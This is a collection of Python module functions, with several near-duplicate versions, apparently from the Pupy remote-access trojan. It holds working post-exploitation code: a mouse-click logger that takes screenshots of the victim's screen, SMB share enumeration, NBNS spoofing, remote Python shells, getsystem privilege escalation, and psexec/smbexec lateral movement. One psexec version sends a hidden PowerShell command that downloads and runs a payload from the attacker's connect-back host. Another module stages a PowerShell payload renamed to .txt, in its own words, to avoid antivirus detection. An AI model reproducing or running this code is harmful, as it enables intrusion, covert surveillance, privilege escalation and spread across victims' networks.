def run(self, args): try: os.makedirs(os.path.join("data","mouselogger")) except Exception: pass if args.action=="start": if self.mouselogger: self.error("the mouselogger is already started") else: self.mouselogger=self.client.conn.modules["pupwinutils.mouselogger"].get_mouselogger() if not self.mouselogger.is_alive(): with redirected_stdo(self): self.mouselogger.start() self.success("mouselogger started") else: self.success("previously started mouselogger session retrieved") else: if not self.mouselogger: self.error("the mouselogger is not running") return if args.action=="dump": self.success("dumping recorded mouse clicks :") screenshots_list=obtain(self.mouselogger.retrieve_screenshots()) self.success("%s screenshots taken"%len(screenshots_list)) for d, height, width, exe, win_title, buf in screenshots_list: try: filepath=os.path.join("data","mouselogger","scr_"+self.client.short_name()+"_"+win_title.decode("utf8",errors="ignore").replace(" ","_").replace("\\","").replace("/","")+"_"+d.replace(" ","_").replace(":","-")+".jpg") pil_save(filepath, base64.b64decode(buf), width, height) self.info("screenshot saved to %s"%filepath) except Exception as e: self.error("Error saving a screenshot: %s"%str(e)) elif args.action=="stop": self.mouselogger.stop() self.job.stop()
def run(self, args): # Retrieve local shared folders try: if args.local: if self.client.is_windows(): self.client.load_package("win32api") self.client.load_package("win32com") self.client.load_package("pythoncom") self.client.load_package("winerror") self.client.load_package("wmi") self.client.load_package("pupwinutils.drives") with redirected_stdo(self.client.conn): self.client.conn.modules[ 'pupwinutils.drives'].shared_folders() else: self.warning( 'this module works only for windows. Try using: run shares remote -t 127.0.0.1' ) return except: pass # Retrieve remote shared folders if not args.target: self.error("target (-t) parameter must be specify") return if "/" in args.target: hosts = IPNetwork(args.target) else: hosts = list() hosts.append(args.target) print hosts self.client.load_package("impacket") self.client.load_package("calendar") self.client.load_package("pupyutils.share_enum") with redirected_stdo(self.client.conn): for host in hosts: self.info("Connecting to the remote host: %s" % host) self.client.conn.modules["pupyutils.share_enum"].connect( host, args.port, args.user, args.passwd, args.hash, args.domain)
def run(self, args): init_winpcap(self.client) # Load full scapy self.client.load_package('scapy', honor_ignore=False, force=True) with redirected_stdo(self): self.client.conn.modules['nbnsspoof'].start_nbnsspoof( args.ip, args.srcmac, timeout=args.timeout, verbose=True, interface=args.iface, name_regexp=args.regex)
def run(self, args): try: with redirected_stdo(self.client.conn): old_completer=readline.get_completer() try: psc=self.client.conn.modules['pyshell.controller'].PyShellController() readline.set_completer(psc.get_completer()) readline.parse_and_bind('tab: complete') while True: cmd=raw_input(">>> ") psc.write(cmd) finally: readline.set_completer(old_completer) readline.parse_and_bind('tab: complete') except KeyboardInterrupt: pass
def run(self, args): try: with redirected_stdo(self): old_completer=readline.get_completer() try: psc=self.client.conn.modules['pyshell.controller'].PyShellController() readline.set_completer(psc.get_completer()) readline.parse_and_bind('tab: complete') while True: cmd=raw_input(">>> ") psc.write(cmd) finally: readline.set_completer(old_completer) readline.parse_and_bind('tab: complete') except KeyboardInterrupt: pass
def run(self, args): try: os.makedirs(os.path.join("data", "mouselogger")) except Exception: pass if args.action == "start": self.client.load_package("pupwinutils.mouselogger") if self.mouselogger: self.error("the mouselogger is already started") else: self.mouselogger = self.client.conn.modules[ "pupwinutils.mouselogger"].get_mouselogger() if not self.mouselogger.is_alive(): with redirected_stdo(self.client.conn): self.mouselogger.start() self.success("mouselogger started") else: self.success( "previously started mouselogger session retrieved") else: if not self.mouselogger: self.error("the mouselogger is not running") return if args.action == "dump": self.success("dumping recorded mouse clicks :") screenshots_list = obtain( self.mouselogger.retrieve_screenshots()) self.success("%s screenshots taken" % len(screenshots_list)) for d, height, width, exe, win_title, buf in screenshots_list: try: filepath = os.path.join( "data", "mouselogger", "scr_" + self.client.short_name() + "_" + win_title.decode("utf8", errors="ignore").replace( " ", "_").replace("\\", "").replace("/", "") + "_" + d.replace(" ", "_").replace(":", "-") + ".jpg") pil_save(filepath, base64.b64decode(buf), width, height) self.info("screenshot saved to %s" % filepath) except Exception as e: self.error("Error saving a screenshot: %s" % str(e)) elif args.action == "stop": self.mouselogger.stop() self.job.stop()
def run(self, args): if "/" in args.target[0]: hosts = IPNetwork(args.target[0]) else: hosts = list() hosts.append(args.target[0]) src = '' dst = '' random_pupy_name = '' # if args.execute_pupy: # random_pupy_name = ''.join(random.sample(string.ascii_letters, 10)) + '.txt' # res=self.client.conn.modules['pupy'].get_connect_back_host() # h, p = res.rsplit(':',1) # self.info("Address configured is %s:%s for pupy dll..."%(h,p)) # self.info("Creating localy a Pupy dll") # pupygen.create_ps1_file(self.client.get_conf(), random_pupy_name, tempfile.gettempdir(), "x86") # pupyDLLLocalPath = os.path.join(tempfile.gettempdir(),random_pupy_name) # print pupyDLLLocalPath # return # # upload the binary to the current session # # remoteTempFolder=self.client.conn.modules['os.path'].expandvars("%TEMP%") # Do a remote path for linux machine # remoteTempFolder=self.client.conn.modules['os.path'].expandvars("%ALLUSERSPROFILE%") # Do a remote path for linux machine # # remoteTempFolder="C:\\Temp\\" # Do a remote path for linux machine # pupyDLLRemotePath = "{0}".format(self.client.conn.modules['os.path'].join(remoteTempFolder, random_pupy_name)) # self.info("Uploading pupy dll in {0}".format(pupyDLLRemotePath)) # upload(self.client.conn, pupyDLLLocalPath, pupyDLLRemotePath) # self.info("File uploaded") # src = pupyDLLRemotePath # dst = '%s\\Temp\\%s' % (args.share, random_pupy_name) self.info("Loading dependencies") self.client.load_package("impacket") self.client.load_package("calendar") self.client.load_package("pupyutils.smbmap") with redirected_stdo(self.client.conn): for host in hosts: self.info("Connecting to the remote host: %s" % host) self.client.conn.modules["pupyutils.smbmap"].connect(host, args.port, args.user, args.passwd, args.hash, args.share, args.list_shares, args.execute_pupy, random_pupy_name, src, dst, args.command, args.domain, args.execm)
def run(self, args): if "/" in args.target[0]: hosts = IPNetwork(args.target[0]) else: hosts = list() hosts.append(args.target[0]) src = '' dst = '' exe_name = '' if args.file: if not os.path.exists(args.file): self.error('File not found: %s' % args.file) return if not args.file.endswith('.exe'): self.error('Only executable files could be uploaded') return exe_name = ''.join(random.sample(string.ascii_letters, 10)) + '.exe' if self.client.is_windows(): remote_path = '%s\\%s' % (self.client.conn.modules['os.path'].expandvars("%ALLUSERSPROFILE%"), exe_name) # Do a remote path for linux machine else: remote_path = '/tmp/%s' % exe_name self.info("Uploading file to {0}".format(remote_path)) upload(self.client.conn, args.file, remote_path) self.info("File uploaded") # once uploaded, this file has to be uploaded to the windows share src = remote_path dst = '%s\\%s' % (args.share.replace('$', ':'), exe_name) self.info("Loading dependencies") self.client.load_package("impacket") self.client.load_package("calendar") self.client.load_package("pupyutils.smbexec") with redirected_stdo(self.client.conn): for host in hosts: self.info("Connecting to the remote host: %s" % host) self.client.conn.modules["pupyutils.smbexec"].connect(host, args.port, args.user, args.passwd, args.hash, args.share, args.file, exe_name, src, dst, args.command, args.domain, args.execm)
def run(self, args): init_winpcap(self.client) self.client.load_package('scapy', honor_ignore=False, force=True) try: with redirected_stdo(self): old_completer = readline.get_completer() try: psc=self.client.conn.modules['pyshell.controller'].PyShellController() readline.set_completer(psc.get_completer()) readline.parse_and_bind('tab: complete') psc.write("from scapy.all import *") while True: cmd=raw_input(">>> ") psc.write(cmd) finally: readline.set_completer(old_completer) readline.parse_and_bind('tab: complete') except KeyboardInterrupt: pass
def run(self, args): code="" if args.file: self.info("loading code from %s ..."%args.file) with open(args.file,'r') as f: code=f.read() else: code=args.code stdout=StringIO.StringIO() stderr=StringIO.StringIO() try: with redirected_stdo(self.client.conn, stdout, stderr): self.client.conn.execute(code+"\n") res=stdout.getvalue() err=stderr.getvalue() if err.strip(): err="\n"+err self.rawlog(res+err) finally: stdout.close() stderr.close()
def run(self, args): code = "" if args.file: self.info("loading code from %s ..." % args.file) with open(args.file, 'r') as f: code = f.read() else: code = args.code stdout = StringIO.StringIO() stderr = StringIO.StringIO() try: with redirected_stdo(self.client.conn, stdout, stderr): self.client.conn.execute(code + "\n") res = stdout.getvalue() err = stderr.getvalue() if err.strip(): err = "\n" + err self.rawlog(res + err) finally: stdout.close() stderr.close()
def run(self, args): PyShellController = self.client.remote('pyshell.controller', 'PyShellController', False) try: with redirected_stdo(self): old_completer = readline.get_completer() try: psc = PyShellController() readline.set_completer(psc.get_completer()) readline.parse_and_bind('tab: complete') while True: cmd = raw_input(">>> ") psc.write(cmd) finally: readline.set_completer(old_completer) readline.parse_and_bind('tab: complete') except (EOFError, KeyboardInterrupt): self.log('pyshell closed')
def run(self, args): code = "" if args.file: self.info("loading code from %s ..." % args.file) with open(args.file, 'r') as f: code = f.read() elif args.code: code = args.code else: raise PupyModuleError("--code or --file argument is mandatory") stdout = StringIO.StringIO() stderr = StringIO.StringIO() try: with redirected_stdo(self.client.conn, stdout, stderr): self.client.conn.execute(code + "\n") finally: res = stdout.getvalue() err = stderr.getvalue() if err.strip(): err = "\n" + err self.rawlog(res + err) stdout.close() stderr.close()
def run(self, args): code="" if args.file: self.info("loading code from %s ..."%args.file) with open(args.file,'r') as f: code=f.read() elif args.code: code=args.code else: raise PupyModuleError("--code or --file argument is mandatory") stdout=StringIO.StringIO() stderr=StringIO.StringIO() try: with redirected_stdo(self.client.conn, stdout, stderr): self.client.conn.execute(code+"\n") finally: res=stdout.getvalue() err=stderr.getvalue() if err.strip(): err="\n"+err self.rawlog(res+err) stdout.close() stderr.close()
def run(self, args): with redirected_stdo(self.client.conn): proc_pid=self.client.conn.modules["pupwinutils.security"].getsystem() migrate(self, proc_pid) self.success("got system !")
def run(self, args): with redirected_stdo(self.client.conn): proc_pid = self.client.conn.modules[ "pupwinutils.getsystem"].getsystem() migrate(self, proc_pid) self.success("got system !")
def run(self, args): if "/" in args.target[0]: hosts = IPNetwork(args.target[0]) else: hosts = list() hosts.append(args.target[0]) ext = '' remote_path = '' dst_folder = '' file_to_upload = [] if args.file or args.ps1: tmp_dir = tempfile.gettempdir() if self.client.is_windows(): remote_path = '%s\\' % self.client.conn.modules['os.path'].expandvars("%ALLUSERSPROFILE%") else: remote_path = '/tmp/' # write on the temp directory if args.share == 'C$': dst_folder = "C:\\Windows\\TEMP\\" # write on the root directory else: dst_folder = '%s\\' % args.share.replace('$', ':') # if executable to upload if args.file: if not os.path.exists(args.file): self.error('File not found: %s' % args.file) return if not args.file.endswith('.exe'): self.error('Only executable files could be uploaded') return ext = '.exe' random_name = ''.join(random.sample(string.ascii_letters, 10)) + ext shutil.copy(args.file, tmp_dir + os.sep + random_name) file_to_upload = [random_name] # if uploading powershell else: ext = '.txt' first_stage = ''.join(random.sample(string.ascii_letters, 10)) + ext second_stage = ''.join(random.sample(string.ascii_letters, 10)) + ext file_to_upload = [first_stage, second_stage] launcher = """cat {invoke_reflective_random_name} | Out-String | IEX""".format(invoke_reflective_random_name=dst_folder + second_stage) launcher = create_ps_command(launcher, force_ps32=True, nothidden=False) open(tmp_dir + os.sep + first_stage, 'w').write(launcher) self.success('first stage created: %s' % tmp_dir + os.sep + first_stage) command = getInvokeReflectivePEInjectionWithDLLEmbedded(self.client.get_conf()) open(tmp_dir + os.sep + second_stage, 'w').write(command) self.success('second stage created: %s' % tmp_dir + os.sep + second_stage) for file in file_to_upload: src = tmp_dir + os.sep + file dst = remote_path + file self.info("Uploading file to {0}".format(dst)) upload(self.client.conn, src, dst) self.success("File uploaded") if args.ps1_oneliner: res=self.client.conn.modules['pupy'].get_connect_back_host() ip, port = res.rsplit(':', 1) cmd = '%s/pupygen.py -f ps1_oneliner --ps1-oneliner-listen-port %s connect --host %s:%s' % (os.getcwd(), str(args.ps1_port), ip, port) self.warning('starting the local server') process = Popen(cmd.split(' '), stdout=PIPE, stderr=PIPE, stdin=PIPE) time.sleep(2) # check if the server has been launched corretly if process.poll(): self.error('the server has not been launched, check if the port %s or if the file %s/pupygen.py exists' % (str(args.ps1_port), os.getcwd())) return self.success('server started (pid: %s)' % process.pid) args.command = 'powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString(\'http://%s:%s/eiloShaegae1\')"' % (ip, str(args.ps1_port)) self.info("Loading dependencies") self.client.load_package("impacket") self.client.load_package('ntpath') self.client.load_package("calendar") self.client.load_package("pupyutils.psexec") with redirected_stdo(self.client.conn): for host in hosts: self.info("Connecting to the remote host: %s" % host) self.client.conn.modules["pupyutils.psexec"].connect(host, args.port, args.user, args.passwd, args.hash, args.share, file_to_upload, remote_path, dst_folder, args.command, args.domain, args.execm) if args.ps1_oneliner: self.warning('stopping the local server (pid: %s)' % process.pid) process.terminate() elif args.ps1: self.warning('Do not forget to remove the file: %s' % dst_folder + first_stage) self.warning('Do not forget to remove the file: %s' % dst_folder + second_stage)
def run(self, args): if "/" in args.target[0]: hosts = IPNetwork(args.target[0]) else: hosts = list() hosts.append(args.target[0]) ext = '' remote_path = '' dst_folder = '' file_to_upload = [] if args.file or args.ps1: tmp_dir = tempfile.gettempdir() if self.client.is_windows(): remote_path = '%s\\' % self.client.conn.modules[ 'os.path'].expandvars("%ALLUSERSPROFILE%") else: remote_path = '/tmp/' # write on the temp directory if args.share == 'C$': dst_folder = "C:\\Windows\\TEMP\\" # write on the root directory else: dst_folder = '%s\\' % args.share.replace('$', ':') # if executable to upload if args.file: if not os.path.exists(args.file): self.error('File not found: %s' % args.file) return if not args.file.endswith('.exe'): self.error('Only executable files could be uploaded') return ext = '.exe' random_name = ''.join(random.sample(string.ascii_letters, 10)) + ext shutil.copy(args.file, tmp_dir + os.sep + random_name) file_to_upload = [random_name] # if uploading powershell else: ext = '.txt' first_stage = ''.join(random.sample(string.ascii_letters, 10)) + ext second_stage = ''.join(random.sample(string.ascii_letters, 10)) + ext file_to_upload = [first_stage, second_stage] launcher = """cat {invoke_reflective_random_name} | Out-String | IEX""".format( invoke_reflective_random_name=dst_folder + second_stage) launcher = create_ps_command(launcher, force_ps32=True, nothidden=False) open(tmp_dir + os.sep + first_stage, 'w').write(launcher) self.success('first stage created: %s' % tmp_dir + os.sep + first_stage) command = getInvokeReflectivePEInjectionWithDLLEmbedded( self.client.get_conf()) open(tmp_dir + os.sep + second_stage, 'w').write(command) self.success('second stage created: %s' % tmp_dir + os.sep + second_stage) for file in file_to_upload: src = tmp_dir + os.sep + file dst = remote_path + file self.info("Uploading file to {0}".format(dst)) upload(self.client.conn, src, dst) self.success("File uploaded") if args.ps1_oneliner: res = self.client.conn.modules['pupy'].get_connect_back_host() ip, port = res.rsplit(':', 1) cmd = '%s/pupygen.py -f ps1_oneliner --ps1-oneliner-listen-port %s connect --host %s:%s' % ( os.getcwd(), str(args.ps1_port), ip, port) self.warning('starting the local server') process = Popen(cmd.split(' '), stdout=PIPE, stderr=PIPE, stdin=PIPE) time.sleep(2) # check if the server has been launched corretly if process.poll(): self.error( 'the server has not been launched, check if the port %s or if the file %s/pupygen.py exists' % (str(args.ps1_port), os.getcwd())) return self.success('server started (pid: %s)' % process.pid) args.command = 'powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString(\'http://%s:%s/eiloShaegae1\')"' % ( ip, str(args.ps1_port)) self.info("Loading dependencies") self.client.load_package("impacket") self.client.load_package('ntpath') self.client.load_package("calendar") self.client.load_package("pupyutils.psexec") with redirected_stdo(self.client.conn): for host in hosts: self.info("Connecting to the remote host: %s" % host) self.client.conn.modules["pupyutils.psexec"].connect( host, args.port, args.user, args.passwd, args.hash, args.share, file_to_upload, remote_path, dst_folder, args.command, args.domain, args.execm) if args.ps1_oneliner: self.warning('stopping the local server (pid: %s)' % process.pid) process.terminate() elif args.ps1: self.warning('Do not forget to remove the file: %s' % dst_folder + first_stage) self.warning('Do not forget to remove the file: %s' % dst_folder + second_stage)
def run(self, args): local_file = '' # restart current exe as system if args.restart: self.info('Using current executable') exe = self.client.desc['exec_path'].split('\\') if exe[len(exe) - 1].lower() in ['powershell.exe', 'cmd.exe' ] and exe[1].lower() == 'windows': self.warning('It seems that your current process is %s' % self.client.desc['exec_path']) self.warning('It is not recommended to restart it') return cmd = self.client.desc['exec_path'] # use powerhell to get a reverse shell elif args.powershell: ros = self.client.conn.modules['os'] rtempfile = self.client.conn.modules['tempfile'] tempdir = rtempfile.gettempdir() random_name = ''.join([ random.choice(string.ascii_letters + string.digits) for n in xrange(6) ]) remotefile = '' self.info('Using powershell payload') if '64' in self.client.desc['os_arch']: local_file = pupygen.generate_ps1(self.client.get_conf(), x64=True) else: local_file = pupygen.generate_ps1(self.client.get_conf(), x86=True) # change the ps1 to txt file to avoid AV detection random_name += '.txt' remotefile = ros.path.join(tempdir, random_name) cmd = u'C:\Windows\System32\WindowsPowerShell\\v1.0\powershell.exe' param = u'-w hidden -noni -nop -c "cat %s | Out-String | IEX"' % remotefile cmd = '%s %s' % (cmd, param) self.info("Uploading file in %s" % remotefile) upload(self.client.conn, local_file, remotefile) # migrate else: cmd = args.prog with redirected_stdo(self): proc_pid = self.client.conn.modules[ "pupwinutils.security"].getsystem(prog=cmd) if args.migrate and not args.restart and not args.powershell: migrate(self, proc_pid) self.success("got system !") else: self.success( "Waiting for a connection (take few seconds, 1 min max)...") if args.powershell: os.remove(local_file)
def run(self, args): local_file = '' #True if ps1 script will be used in bind mode. If reverse connection with ps1 then False isBindLauncherForPs1 = False #Contains ip:port used for bind connection on the target with ps1 script. None if reverse connection and (consequently) isBindLauncherForPs1==False listeningAddressPortForBindPs1 = None #Usefull information for bind mode connection (ps1 script) launcherType, addressPort = self.client.desc['launcher'], self.client.desc['address'] #Case of a pupy bind shell if ps1 mode is used (no reverse connection possible) if launcherType == "bind": self.info('The current pupy launcher is using a BIND connection. It is listening on {0} on the target'.format(addressPort)) isBindLauncherForPs1 = True self.info('Consequently, powershell option is enabled') args.powershell = True else: self.info('The current pupy launcher is using a REVERSE connection (e.g. \'auto_proxy\' or \'connect\' launcher)') isBindLauncherForPs1 = False # restart current exe as system if args.restart: self.info('Using current executable') exe = self.client.desc['exec_path'].split('\\') if exe[len(exe)-1].lower() in ['powershell.exe', 'cmd.exe'] and exe[1].lower() == 'windows': self.warning('It seems that your current process is %s' % self.client.desc['exec_path']) self.warning('It is not recommended to restart it') return cmd = self.client.desc['exec_path'] # use powerhell to get a reverse shell elif args.powershell or isBindLauncherForPs1: clientConfToUse = None ros = self.client.conn.modules['os'] rtempfile = self.client.conn.modules['tempfile'] tempdir = rtempfile.gettempdir() random_name = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(6)]) remotefile = '' if isBindLauncherForPs1: self.info('Using powershell payload because the launcher on the target uses a bind connection. Launcher listens on {0}'.format(addressPort)) self.info("Bind launcher used. So a BIND ps1 will be used in child launcher. This ps1 will listen on your given port") self.info("Be careful, you have to choose a port which is not used on the target!") listeningPort = -1 while listeningPort==-1: try: listeningPort = int(input("[?] Give me the listening port to use on the target: ")) except Exception as e: self.warning("You have to give me a valid port. Try again. ({})".format(e)) listeningAddress = addressPort.split(':')[0] listeningAddressPortForBindPs1 = "{0}:{1}".format(listeningAddress, listeningPort) self.info("The ps1 script used for get a System pupy shell will be configured for listening on {0} on the target".format(listeningAddressPortForBindPs1)) bindConf = self.client.get_conf() #Modify the listening port on the conf. If it is not modified, the ps1 script will listen on the same port as the inital pupy launcher on the target bindConf['launcher_args'][bindConf['launcher_args'].index("--port")+1] = str(listeningPort) clientConfToUse = bindConf else: self.info('Using powershell payload because you have chosen this option. The launcher on the target uses a reverse connection') clientConfToUse = self.client.get_conf() if '64' in self.client.desc['proc_arch']: local_file = pupygen.generate_ps1(clientConfToUse, x64=True) else: local_file = pupygen.generate_ps1(clientConfToUse, x86=True) # change the ps1 to txt file to avoid AV detection random_name += '.txt' remotefile = ros.path.join(tempdir, random_name) cmd = u'C:\Windows\System32\WindowsPowerShell\\v1.0\powershell.exe' param = u'-w hidden -noni -nop -c "cat %s | Out-String | IEX"' % remotefile cmd = '%s %s' % (cmd, param) self.info("Uploading file in %s" % remotefile) upload(self.client.conn, local_file, remotefile) # migrate else: cmd = args.prog with redirected_stdo(self): proc_pid = self.client.conn.modules["pupwinutils.security"].getsystem(prog=cmd) if args.migrate and not args.restart and not args.powershell: migrate(self, proc_pid, keep=args.keep, timeout=args.timeout) self.success("got system !") else: if isBindLauncherForPs1 == True: self.success("You have to connect to the target manually on {0}: try 'connect --host {0}' in pupy shell".format(listeningAddressPortForBindPs1)) else: self.success("Waiting for a connection (take few seconds, 1 min max)...") if args.powershell: os.remove(local_file)